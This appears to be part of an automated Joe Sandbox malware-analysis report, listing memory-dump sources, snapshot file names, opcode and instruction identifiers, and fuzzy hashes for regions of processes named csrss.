                                                      • Opcode Fuzzy Hash: 74a14c0d6d08d1f4a984ac3ae70772f5ed6ffe6d1df5115cad950b3c16aca0aa
                                                      • Instruction Fuzzy Hash: 05212521B1DD591FE788B62C544A67D77C2EF99361F5400BAE80EC32D7DE38AC818689
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e90aea7d7e2fb258bc494ca917284dfcc11dfa4d7e8c0c4e0671a266e12b86cc
                                                      • Instruction ID: 3ee9b9f2661fa002569fab8a8de56207d2abccdc1d8fc72fd67ef6f0cbc061e6
                                                      • Opcode Fuzzy Hash: e90aea7d7e2fb258bc494ca917284dfcc11dfa4d7e8c0c4e0671a266e12b86cc
                                                      • Instruction Fuzzy Hash: 23316D3190D68A8FDB46EB68C8659AD7BF1FF26340F4805BAC009D72A3DB39A845C751
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e7d97f272f09ce0f920f9e9171564b71da0ad6ee895b27a10b4aae1be120cce
                                                      • Instruction ID: 18b5dbcde3cd83a4f026fac3099cbc2b8167b821916cd75333d2e040dd9cc7f0
                                                      • Opcode Fuzzy Hash: 8e7d97f272f09ce0f920f9e9171564b71da0ad6ee895b27a10b4aae1be120cce
                                                      • Instruction Fuzzy Hash: 7B318231E1C94A8FDB59EA18C4956A873A2FFA8394F04467AC00ED72C6DF78AC418785
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f34e9181bbbe5c1e9189cea231ca90dc12e8d4e0327a88c2ca295de349cfa7c
                                                      • Instruction ID: f0149ae9fefcb5b1bc46d63257f3f1054e7f9d2376b55b603a14856d4b18fe53
                                                      • Opcode Fuzzy Hash: 7f34e9181bbbe5c1e9189cea231ca90dc12e8d4e0327a88c2ca295de349cfa7c
                                                      • Instruction Fuzzy Hash: 6A212251A4DD5A3EF65CB27C644A2FC62C1EF483A1F5890BAE40DC31D3DE28A8804699
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction ID: e2916f8f3927bac2856ae2f3f79d098971771a8ef401f154be0260b14a816d97
                                                      • Opcode Fuzzy Hash: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction Fuzzy Hash: 03214C21E0C90A8FEBA4FB6884587BC22D2FF94391F9546B5D40DD32A2DF38AC418758
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1301c61026e425fc4b34307b34f1aa0f570787a40bcd17521343c78139a6254
                                                      • Instruction ID: 44a047379d0cf3b85a1af5747c981392c96324331d652d7576fed198d79671b9
                                                      • Opcode Fuzzy Hash: f1301c61026e425fc4b34307b34f1aa0f570787a40bcd17521343c78139a6254
                                                      • Instruction Fuzzy Hash: 6B21D131A0D689AFE712FF28C8452EC7BA0FF42391F9445FAC0449B1D2DB3825498BA5
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction ID: abbd0e3e283a064e2ebac4cda9bf775290763dd3cefe0422f784367c7492297c
                                                      • Opcode Fuzzy Hash: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction Fuzzy Hash: EB117C21E0C91A4FEBA8FB6884516B872D2FF98344F9005BAD40EC72D6DF78AC024784
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d321457ab1106d32db5cb0c737f1f24cc86c4cc4ebc1468c3e7d5a21d4519a5
                                                      • Instruction ID: a35cb591a892d801521c859811156ae2fe338a03ebf17656c776e51da3b09a37
                                                      • Opcode Fuzzy Hash: 2d321457ab1106d32db5cb0c737f1f24cc86c4cc4ebc1468c3e7d5a21d4519a5
                                                      • Instruction Fuzzy Hash: C111DA70908A198FDB94EB08C894FA973E1FB58311F5441AAD40EE7290CB34AEC4CF85
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction ID: 3e2ee4ab451bbfa1aa9779ae36a969c299aecd2b97b891b4c87c5861ffc68329
                                                      • Opcode Fuzzy Hash: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction Fuzzy Hash: 74118E31A0D68D9FE702FB28D8452EC7FB0FF42351F5546F6C084DB292DA3856498B95
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction ID: b71984adc48415056163cd267d1085e04ccf1c7d40b1c881cf8088fd84907d6f
                                                      • Opcode Fuzzy Hash: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction Fuzzy Hash: B2014E56D8E5922ED70C76BCB8560F43B90EF0227AF0C90B7D08C8A153DE0954898799
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56eb1fa5da1cbd767d7ff68142e1ba42fcd81ca97e626d5bf86ca61610b1b069
                                                      • Instruction ID: 45e637b210130aaad20636ad6fa7a1e87a47a382ffb265169d189ea747c3b77a
                                                      • Opcode Fuzzy Hash: 56eb1fa5da1cbd767d7ff68142e1ba42fcd81ca97e626d5bf86ca61610b1b069
                                                      • Instruction Fuzzy Hash: C3017132F089098FEB54EA58D4803FC77A2FBA83A1F094171D01DE7195DF79A8868754
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction ID: d85d40a25b7ff359e4467be9493c396adcc6bec3f2e1cfd15c1ab4406b8f88ac
                                                      • Opcode Fuzzy Hash: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction Fuzzy Hash: 2D016931A0D6899FE702EB28C8542EDBFB0FF42350F5545E6C080DB292DA3856498B95
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction ID: a91b8619bec2bf361a0c115887e1dd36093ec5f47597101b0e4213bdb8518002
                                                      • Opcode Fuzzy Hash: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction Fuzzy Hash: A7F0FC31D0C5864FE766B66484142BA37D1BF96358F0902BBC44EC71D3DE7C99468355
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50ea1c31d708645bc9edc685278084fcff4d137b6002ed32c8d2ab33c1dc3988
                                                      • Instruction ID: 162b762cbb97feb5fc6e94ab1ab95c5c7ce3af4e6a9b7d0e6f3297f334f02dbd
                                                      • Opcode Fuzzy Hash: 50ea1c31d708645bc9edc685278084fcff4d137b6002ed32c8d2ab33c1dc3988
                                                      • Instruction Fuzzy Hash: 94018B21E0C85A8FFA94FA548455AA83291FF55340F1442F6D80DD32D2DF38BD428B84
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction ID: 4417abdbef1c0bcda944008d119b87f96253d1a83ae4d7787a3e7108bee77af6
                                                      • Opcode Fuzzy Hash: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction Fuzzy Hash: 46015A7190D7899FE702EB68C84429DBFB0FF42354F5541EAD040DB292DA385A49CB91
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9972a11d5bc5eabba6ecd45fd49e9ceace7690c6507b1bdb0097d2214021b141
                                                      • Instruction ID: e1256bd42853e4a8fa8f65879b2a482054854013c94147e1a8857e1fd26f8f41
                                                      • Opcode Fuzzy Hash: 9972a11d5bc5eabba6ecd45fd49e9ceace7690c6507b1bdb0097d2214021b141
                                                      • Instruction Fuzzy Hash: DF018F31E0D9668FEB61FB28845467C7790FF55350FA401F6C44ED3282DF3929419785
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 93df89259070d39eeee891dfa952953b187c30ae293fd6bc712e26a92ea0700f
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: FCD05222C1D9228EFA72214008241BD0201AB803B0FA90772D86D2B0C09F7CAC019A2A
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: 4aa18af1f661fabb0a2e2203a43a442a2c3407ad42402b65ed2ba776a251d591
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: D6C08C305108088FC908FB28C88480837A0FF09200BC20090E008C7170D229DCC1D741
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4960593f5e9ba63c91db8bb8f67d76f049f51e4c57264b9b0e026604b0ed6b80
                                                      • Instruction ID: 01d19c03aeb6c287f6621aa3ee205c62654490548f330472fe0212c3aa7f6b12
                                                      • Opcode Fuzzy Hash: 4960593f5e9ba63c91db8bb8f67d76f049f51e4c57264b9b0e026604b0ed6b80
                                                      • Instruction Fuzzy Hash: B7C08C06E0EC169AE35A320440221BE44029F80784F9400B5E00E873CADF0C1E0652CA
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 37703ee556c4e8627d10b7c80c769574e06979db5dbbed10f1728ee220f40bb0
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: 0BB01200C5E40F04E40431BB084306C70407FC4244FC10070D40C41182E97D1094025A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction ID: d8d3bf98ff88aa51002e8d513fa4bc641ecc0acbef1d3040d477bc56c04107bd
                                                      • Opcode Fuzzy Hash: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction Fuzzy Hash: 9F515ED6ADE86A7DE61D36BDB4111FD6B44EF812B5F4C93B7E04C890838E18608186FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5[_H$<O_^
                                                      • API String ID: 0-4097811043
                                                      • Opcode ID: 4020ef3c2d1b768e02ed8f39c311f0facdb46bc356a953bd1537a06f47c18d54
                                                      • Instruction ID: 408abc039804a0bc5a240e3e1b6b1f635399829ddc144950961d6821ecb393ee
                                                      • Opcode Fuzzy Hash: 4020ef3c2d1b768e02ed8f39c311f0facdb46bc356a953bd1537a06f47c18d54
                                                      • Instruction Fuzzy Hash: 7F91F2B5A1DA998FE749AB28C8257A97FE1FF96350F4401BAC00AE73D2DB781404C711
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e25427d1668d1d2a177894b21f70d136b758917e06ddb9cf52aa004bb5997c63
                                                      • Instruction ID: a12e5ac3698a1a86baffb64a55fc1c7a838e973e0ba981fe8812b6925ed4c111
                                                      • Opcode Fuzzy Hash: e25427d1668d1d2a177894b21f70d136b758917e06ddb9cf52aa004bb5997c63
                                                      • Instruction Fuzzy Hash: BC32A331E1CD5A9FEA98FA2884516B973A2FF94780F5445B9C40EC32C7DF38AC428785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: 86ee436aa5fa306c6a774ae93fc70dbaf80114297c2dcd94af70568608a29878
                                                      • Instruction ID: caa1196e0f46fb3bd8837376e205d593e9dd25cab37fe1390c41d1509c788cb7
                                                      • Opcode Fuzzy Hash: 86ee436aa5fa306c6a774ae93fc70dbaf80114297c2dcd94af70568608a29878
                                                      • Instruction Fuzzy Hash: D181E021E1C98A5FEA98FA6C84563B963D2FF54784F0451B9D40EC32D7DEB8AC418285
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: 7006af376b87a4a72ee12f6def368957f768f2ebe42d7ad1dc79373e0f4f1f8f
                                                      • Instruction ID: 89fd55b971723e5f79bfdf67157a95ffc6b3ec2cb6bf88e43468aed95f29847b
                                                      • Opcode Fuzzy Hash: 7006af376b87a4a72ee12f6def368957f768f2ebe42d7ad1dc79373e0f4f1f8f
                                                      • Instruction Fuzzy Hash: CD51BF20E1C94E5FEA98FA6CC4567B9B3D2FF94794F049579C40EC3287DEB8A8414385
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: c077d0536f444b8a9f7ca755632c820e59539509f58fcf9ef1d7ffdc6d030a66
                                                      • Instruction ID: 47ff2941b830ae47be1a686156ec20d976ea6786175147e52c3ac6ea4a1954c6
                                                      • Opcode Fuzzy Hash: c077d0536f444b8a9f7ca755632c820e59539509f58fcf9ef1d7ffdc6d030a66
                                                      • Instruction Fuzzy Hash: 9DF09B7190E7C54FC716EA3488694547FA0EF6720174A41EEC045CF1A3EA2DDC85C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
